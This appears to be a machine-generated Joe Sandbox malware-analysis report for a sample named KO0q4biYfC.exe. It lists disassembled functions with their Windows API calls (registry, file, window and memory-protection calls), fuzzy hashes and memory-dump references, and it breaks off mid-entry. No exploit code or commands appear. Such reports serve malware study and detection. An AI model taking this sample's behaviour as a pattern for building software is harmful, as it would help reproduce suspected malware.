Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D

Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E67
EnableWindow.USER32(00000000,00000000), ref: 00401E72

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E

Function 004067C2 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E

Function 00405EDE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405EE2
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15

Function 0040599C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,?,0000000A), ref: 004059A2
GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 004059B0

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D

Function 73C62AAC Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 73C62B6B

Memory Dump Source

Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2c9d53e2edf26176e4d7c6dd775db2b15c36f8365879e2b60f4952cca72c20a0
Instruction ID: 29237586ee0fd1c977998becfed925c38256cdb3e120682d29f631b6883c8ec8
Opcode Fuzzy Hash: 2c9d53e2edf26176e4d7c6dd775db2b15c36f8365879e2b60f4952cca72c20a0
Instruction Fuzzy Hash: AB41A3B2800748EFEB21EF66DEC57593779FB44354F34442AE609CE244DB35D8858B92

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E

Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,?,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: d36677f8d2e559cb387ccec067656e7046d6eb767eaf07478cee85b9d292eaec
Instruction ID: 3617ef58ccd7aa140dffe44bfab91b8a7bb5611f18f48832d751fbee8bc5d3eb
Opcode Fuzzy Hash: d36677f8d2e559cb387ccec067656e7046d6eb767eaf07478cee85b9d292eaec
Instruction Fuzzy Hash: AAE0DF72700100EBE710DFA4DE48EAA33A8DF40368B30823AF611B60D0E6B4A9419B3D

Function 00406283 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634

Function 00405F61 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4

Function 00405F90 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F00B,0040CED0,004033DE,0040CED0,0040F00B,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8

Function 73C62993 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(73C6505C,?,?,73C6504C), ref: 73C629B1

Memory Dump Source

Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 30f7da4f50a63e2fbb71b3348c54385fb79cbec620c90940b32f31423560f8f7
Instruction ID: 5a844b6aa41885f25e5a9178b606548d212b1c6d2601b7991046fb00412cc441
Opcode Fuzzy Hash: 30f7da4f50a63e2fbb71b3348c54385fb79cbec620c90940b32f31423560f8f7
Instruction Fuzzy Hash: 57F092F2504AC1DEC390EF2B85847093BE0BB09204F34452AE39CDE285E334C848CB91

Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
